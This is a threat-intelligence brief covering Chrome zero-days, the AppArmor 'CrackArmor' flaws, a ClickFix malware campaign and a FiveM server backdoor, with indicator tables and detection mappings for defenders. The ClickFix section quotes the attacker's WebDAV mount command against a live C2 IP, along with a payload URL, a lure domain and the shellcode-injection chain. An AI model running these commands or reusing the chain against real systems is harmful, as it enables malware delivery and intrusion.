Cyber Threat Brief — March 15 2026
1. Google Chrome Dual Zero-Days (CVE-2026-3909 & CVE-2026-3910) — CISA KEV
Summary
Google patched two high-severity Chrome zero-days on March 12-13 that are confirmed actively exploited in the wild. Both bugs were discovered internally and added to CISA’s KEV catalog on March 13 — federal agencies have until March 27 to patch. One hits Skia’s 2D graphics library (out-of-bounds write), the other hits the V8 JavaScript engine (inappropriate implementation enabling sandbox escape). This is Chrome’s third actively weaponized zero-day of 2026.
What’s New (Last 24 Hours)
- CISA added both CVE-2026-3909 and CVE-2026-3910 to the Known Exploited Vulnerabilities catalog on 2026-03-13, requiring FCEB patch by 2026-03-27
- Google confirmed: “exploits for both CVE-2026-3909 and CVE-2026-3910 exist in the wild”
- Aviatrix TRC analysis (March 14) confirmed attacker chains linking CVE-2026-3909 → CVE-2026-3910 for RCE + privilege escalation before lateral movement
- Microsoft Edge, Brave, Opera, and Vivaldi users need vendor-specific updates as Chromium-based browsers share the vulnerable code paths
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
| Chrome versions below 146.0.7680.75/76 (Win/macOS) or 146.0.7680.75 (Linux) | Vulnerable Software | T1203 | EDR software inventory / asset mgmt | Alert on or block execution of outdated Chrome builds; enforce update via policy |
| Crafted HTML page delivery via browser | TTP | T1189 | Web proxy / DNS logs | Hunt for anomalous browser child processes spawned after visiting external URLs |
| Unexpected browser child process execution | TTP | T1203 | EDR process telemetry | Alert on chrome.exe or msedge.exe spawning unexpected child processes (cmd, powershell, wscript) |
| Out-of-bounds write in Skia (CVE-2026-3909) | Exploit Mechanism | T1203 | Crash reports / browser telemetry | Correlate crash telemetry from Skia renderer with subsequent suspicious child processes |
| Sandbox escape via V8 inappropriate impl (CVE-2026-3910) | Exploit Mechanism | T1203 | EDR / browser sandbox telemetry | Monitor for renderer processes making unexpected system calls outside sandbox boundaries |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|
| Splunk | None found | No direct Splunk ESCU rule for Chrome Skia/V8 exploitation. Supplement with EDR-based browser child process alerting and vulnerable software inventory searches. |
| Elastic | Suspicious Browser Child Process | Fires when Chrome/Edge spawns unusual child processes — directly relevant to post-exploitation behavior following CVE-2026-3909/3910 sandbox escape on macOS. |
| Sigma | Suspicious Browser Child Process - MacOS | Covers anomalous child process creation from browser processes, mapping to post-exploitation spawning after Skia/V8 exploitation. |
Sources
2. CrackArmor — Nine AppArmor Flaws Enable Local Root on 12.6M Linux Systems
Summary
Qualys TRU disclosed nine confused-deputy vulnerabilities in Linux’s AppArmor security module on March 12, 2026. Dubbed “CrackArmor,” the flaws have existed since kernel v4.11 (2017) and affect Ubuntu, Debian, SUSE, and cloud/Kubernetes/edge deployments. An unprivileged local user can manipulate security profiles via pseudo-files, bypass user-namespace restrictions, trigger kernel stack exhaustion (kernel panic on x86-64), and bypass KASLR via out-of-bounds reads. No CVE IDs yet — upstream kernel process delays assignment by 1-2 weeks post-patch. Qualys developed working PoCs and shared with vendors; public release withheld. The X community is already publishing Sigma-based detection via owLSM.
What’s New (Last 24 Hours)
- Qualys blog published March 12-13 with full technical breakdown confirming root escalation via Sudo/Postfix tool interactions
- Community detection response emerging: @SilverPlate3x published Sigma rules via owLSM (kernel-level Sigma rule engine) specifically targeting CrackArmor exploitation patterns
- Qualys recommends monitoring
/sys/kernel/security/apparmor/ for unauthorized profile modifications as an exploitation indicator
- Scope: 12.6M+ enterprise Linux instances with AppArmor enabled by default (Ubuntu, Debian, SUSE, cloud platforms)
- No CVE IDs assigned yet — patch tracking requires advisory/kernel version tracking, not CVE lookup
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
/sys/kernel/security/apparmor/ write events by non-root processes | File System TTP | T1548.001 | Linux auditd / EDR file monitoring | Alert on writes to AppArmor pseudo-file paths by unprivileged UIDs; baseline normal values first |
| Unprivileged process spawning with elevated capabilities after AppArmor profile modification | TTP | T1068 | EDR process telemetry / auditd | Hunt for unexpected capability grants (CAP_SYS_ADMIN) following profile manipulations |
sudo or postfix process interaction with AppArmor profile paths | TTP | T1548.001 | EDR / auditd syscall log | Detect confused-deputy: low-privilege processes using high-privilege tools (sudo/postfix) to manipulate profiles |
| Kernel panic / unexpected reboot after deep AppArmor subprofile removal | DoS TTP | T1499.004 | Syslog / kernel crash logs | Alert on kernel panics on x86-64 systems; correlate with prior AppArmor operations via auditd |
| KASLR info leak via out-of-bounds read on AppArmor pseudo-file | TTP | T1083 | Linux auditd reads on /sys/kernel/security/apparmor/ | Monitor for bulk OOB read patterns on sysfs AppArmor entries from non-privileged contexts |
| Containers or Kubernetes pods with AppArmor profile disabled/modified | TTP | T1611 | Kubernetes audit logs / container runtime logs | Alert on pods that disable AppArmor profile or switch to unconfined runtime during execution |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|
| Splunk | Linux pkexec Privilege Escalation | Covers a similar confused-deputy LPE pattern (privileged tool abuse) — useful analog while CrackArmor-specific rules are developed; monitors unexpected pkexec executions that could indicate toolchain abuse. |
| Elastic | Kernel Load or Unload via Kexec Detected | Detects kernel manipulation attempts; relevant for monitoring kernel-level exploitation follow-on activity after AppArmor bypass achieves root. Kubernetes Privileged Pod Created covers container escape escalation path via CrackArmor container isolation bypass. |
| Sigma | Privileged Container Deployed | Detects creation of privileged Kubernetes pods — directly relevant to CrackArmor’s container isolation bypass vector where AppArmor profile manipulation removes pod confinement. |
Sources
3. ClickFix Evolution — WebDAV + Trojanized Electron App Bypasses Defender
Summary
A new ClickFix variant documented on March 14 replaces the usual PowerShell/mshta stage with a net use WebDAV drive mapping, then executes a trojanized WorkFlowy Electron application with malicious logic injected into the app.asar archive. The campaign bypassed Microsoft Defender for Endpoint entirely — Atos researchers only caught it via behavioral threat hunting on the RunMRU registry key. A parallel campaign tracked by @inf0stache (March 14) shows a separate ClickFix chain delivering XOR+AES-encrypted Donut shellcode that injects a .NET assembly into explorer.exe. Two flavors, same social engineering lure, both requiring defender teams to hunt on behavioral signals rather than signatures.
What’s New (Last 24 Hours)
- Atos TRC published full technical breakdown on March 14 — first documented ClickFix variant using
net use WebDAV as delivery mechanism, evading all standard EDR script-execution detections
- Malicious WorkFlowy v1.4.1050 (signed by FunRoutine Inc.) distributes with backdoored
resources/app.asar; legitimate app signed, malicious logic hidden in Node.js entry point main.js
- C2 confirmed at
94.156.170[.]255 (WebDAV server), ZIP payload at https://94.156.170[.]255/flowy.zip
- Lure domain:
happyglamper[.]ro (fake CAPTCHA / Win+R prompt)
- RunMRU registry key (
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) captures user-executed commands including the WebDAV mount — key hunt pivot for this campaign
- Parallel campaign (inf0stache analysis): ClickFix → mshta → PowerShell → XOR+AES decrypt (SHA256 key derivation with salt+“kizo”) → Donut x64 shellcode → .NET assembly injected into
explorer.exe with TripleDES-encrypted C2 config
- Infosecurity Magazine reports WordPress-delivered ClickFix delivering Vidar Stealer, Impure Stealer, Vodka Stealer, and Double Donut payloads (March 13)
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
cmd.exe /c net use Z: https://94.156.170[.]255/webdav /persistent:no | Command Line | T1059.003 | EDR process telemetry | Alert on net use with HTTPS WebDAV paths — especially with /persistent:no flag followed by immediate script execution |
94.156.170[.]255 | IP IOC | T1105 | Firewall / proxy / DNS logs | Block and alert on outbound connections to this IP; also block WebDAV (port 443) to untrusted hosts |
happyglamper[.]ro | Domain IOC | T1566.002 | DNS logs / web proxy | Block/alert on DNS queries and HTTP/S connections to this domain |
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU | Registry Key | T1204.001 | EDR registry telemetry | Hunt RunMRU for net use entries with external HTTPS paths — reliable behavioral indicator for this ClickFix flavor |
%LOCALAPPDATA%\MyApp\WorkFlowy.exe / resources\app.asar (v1.4.1050) | File Path | T1059.007 | EDR file telemetry | Alert on WorkFlowy.exe writing/reading app.asar files to non-standard paths; monitor Electron apps in %LOCALAPPDATA% |
PowerShell Invoke-WebRequest downloading ZIP then Expand-Archive to %LOCALAPPDATA% | TTP | T1105 | EDR / PowerShell script block logging | Alert on PowerShell download followed by Expand-Archive to user-writable directories |
| XOR+AES-CBC decrypt with SHA256 key from salt + hardcoded “kizo” | Obfuscation TTP | T1027.013 | EDR memory / AV sandbox | Hunt for multi-layer crypto decryption patterns in PowerShell or .NET processes at runtime |
Donut x64 shellcode injected into explorer.exe | TTP | T1055.001 | EDR memory injection telemetry | Alert on explorer.exe receiving remote thread creation from non-system processes |
.NET assembly loaded reflectively into explorer.exe | TTP | T1055.002 | EDR memory telemetry | Detect reflective PE injection into explorer.exe; watch for SmtpClient-related network calls from this process |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
4. Blum Panel — FiveM Gaming Backdoor Fully Reverse-Engineered, 3,856 Servers Infected
Summary
A 16-hour investigation (March 13-14) by Justice Gaming Network fully reversed the Blum Panel, a commercial FiveM backdoor sold for €59.99/month that provides paying customers full remote control over infected GTA:Online roleplay servers. The C2 at 185.87.23.198 was infiltrated without authentication, exposing a database of 3,856 infected servers, 289 players’ PII (real IPs, Discord IDs, Steam IDs), and 7 pre-built RCE payloads. Detection is straightforward: check for GlobalState.miauss and GlobalState.ggWP globals in server console. Built on stolen Cipher Panel code.
What’s New (Last 24 Hours)
- Full deobfuscated source code, C2 database (sanitized), and payload library published to GitHub on March 14
- C2 server identified:
185.87.23.198 (Active 1 GmbH, Hamburg, Germany) — no authentication required to extract full database
- Payload library contains 7 pre-built RCE scripts deployable against any connected FiveM server
- 28 paying customers identified from billing records
- Detection confirmed:
GlobalState.miauss (dropper) and GlobalState.ggWP (replicator) are active infection indicators in FiveM server console
block_c2.sh script published to immediately block the C2 IP- Second product (GFX Panel) identified on same unprotected infrastructure
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
185.87.23.198 | C2 IP | T1219 | Firewall / network logs | Block outbound to this IP immediately; alert on any established connections from FiveM server hosts |
GlobalState.miauss | In-Memory Indicator | T1059.007 | FiveM server console logs | Run if GlobalState.miauss then print("DROPPER ACTIVE") end in console; presence confirms active infection |
GlobalState.ggWP | In-Memory Indicator | T1059.007 | FiveM server console logs | Run if GlobalState.ggWP then print("REPLICATOR ACTIVE") end; presence confirms replication component active |
| Blum Panel / GFX Panel domains | Domain IOCs | T1219 | DNS logs | Block/alert on DNS queries to panel domains; check evidence/infected_servers_sanitized.json for server names |
| Obfuscated JavaScript with multiple decode layers | TTP | T1027.002 | File analysis / AV sandbox | Scan FiveM resources/ directories for obfuscated JS files with unusual entropy; run scanner from repo |
| RCE payload delivery via API key to any connected server | TTP | T1059.007 | FiveM server console / resource logs | Monitor for unexpected resource loading or execution from authenticated API calls |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|
| Splunk | None found | No direct Splunk ESCU detection for FiveM/gaming platform backdoors. Use network detection (firewall blocks on 185.87.23.198) and server-side script monitoring as primary controls. |
| Elastic | Network Traffic to Rare Destination Country | ML-based anomaly detection that would fire on unexpected outbound traffic to Germany (Active 1 GmbH) from gaming server infrastructure if Germany is not a normal destination. |
| Sigma | Local Network Connection Initiated By Script Interpreter | Partially applicable — covers script interpreter network connections; adapt for FiveM’s Node.js/V8 runtime making outbound calls to C2. Primary detection is IOC-based (IP/domain blocklist) and console-side indicator checks. |
Sources